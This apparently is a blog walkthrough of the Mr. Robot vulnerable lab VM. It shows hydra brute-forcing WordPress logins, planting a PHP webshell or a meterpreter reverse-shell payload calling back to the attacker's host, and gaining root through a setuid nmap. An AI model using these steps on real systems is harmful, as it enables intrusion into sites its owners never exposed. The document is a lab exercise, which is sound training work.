Mr. Robot
Vulnerable VM image
This system was setup with a host only network on virtualbox 5.2.
Download from vulnhub or magnet
Enumeration
Started with nmap, basic settings:
# nmap -sS --script vuln 192.168.56.101 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-07 23:19 UTC
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for 192.168.56.101
Host is up (0.00084s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
| Found the following possible CSRF vulnerabilities:
…
| Path: http://192.168.56.101:80/wp-login.php
| Form id: loginform
|_ Form action: http://192.168.56.101/wp-login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
Looks like this is a wordpress blog. Also robots.txt:
# curl http://192.168.56.101/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
Looks like a dictionary file of some sort. 858k lines is a lot, but sorted and dedupped, it’s a lot fewer:
# wc -l fsocity.dic
858160 fsocity.dic
# sort fsocity.dic | uniq > fsocity.sorted
# wc -l fsocity.sorted
11451 fsocity.sorted
The tool of choice for wordpress is wpscan. However, it’s not terribly helpful for figuring out usernames with default settings:
# wpscan -u 192.168.56.101 --enumerate u
[+] Enumerating usernames ...
[+] We did not enumerate any usernames
Wordpress has a weakness that allows brute force guessing of usernames. Login attempts for users that don’t exist have the string “Invalid username” in the response. Switching to hydra, it’s easier to make progress:
# hydra -L fsocity.sorted -p asdf 192.168.56.101 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-08 00:52:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//wp-login.php:log=^USER^&pwd=^PASS^:Invalid username
[STATUS] 619.00 tries/min, 619 tries in 00:01h, 10833 to do in 00:18h, 16 active
[STATUS] 613.67 tries/min, 1841 tries in 00:03h, 9611 to do in 00:16h, 16 active
[80][http-post-form] host: 192.168.56.101 login: ELLIOT password: asdf
[80][http-post-form] host: 192.168.56.101 login: Elliot password: asdf
[STATUS] 618.14 tries/min, 4327 tries in 00:07h, 7125 to do in 00:12h, 16 active
[STATUS] 617.08 tries/min, 7405 tries in 00:12h, 4047 to do in 00:07h, 16 active
[80][http-post-form] host: 192.168.56.101 login: elliot password: asdf
[STATUS] 617.06 tries/min, 10490 tries in 00:17h, 962 to do in 00:02h, 16 active
[STATUS] 616.83 tries/min, 11103 tries in 00:18h, 349 to do in 00:01h, 16 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-08 01:10:35
This looks like the username is not case sensitive even. Running hydra again with only a little bit changed should reveal a password, if it’s in this wordlist:
# hydra -f -l elliot -P fsocity.sorted 192.168.56.101 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:incorrect"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-08 01:16:14
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:1/p:11452), ~716 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//wp-login.php:log=^USER^&pwd=^PASS^:incorrect
[STATUS] 568.00 tries/min, 568 tries in 00:01h, 10884 to do in 00:20h, 16 active
[STATUS] 562.67 tries/min, 1688 tries in 00:03h, 9764 to do in 00:18h, 16 active
[STATUS] 558.86 tries/min, 3912 tries in 00:07h, 7540 to do in 00:14h, 16 active
[80][http-post-form] host: 192.168.56.101 login: elliot password: ER28-0652
[STATUS] attack finished for 192.168.56.101 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-08 01:23:27
With the username and password, an admin login is now possible.
!! Low privs
With admin control of a wordpress blog, the easiest thing to do is edit a theme file, like the 404 file, and insert some sort of php webshell. It can be as simple as @passthru($_POST['cmd'); or as complicated as a meterpreter session:
> use payload/php/meterpreter/reverse_tcp
> set LHOST 192.168.56.1
> set LPORT 443
> generate -t raw
> to_handler
Opening a shell, will reveal the daemon user.
!! Root privs
Following standard local file enumeration gets a list a setuid programs:
$ find / -perm /6000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/sbin/unix_chkpwd
It’s not normal for nmap to have a suid bit set. This is probably the way in:
/usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
While the uid of the sh process spawned by nmap is not 0, the effective uid is 0, and it is possible to do anything as the root user.
Share this post
Twitter
Facebook
Reddit
LinkedIn
StumbleUpon
Pinterest
Email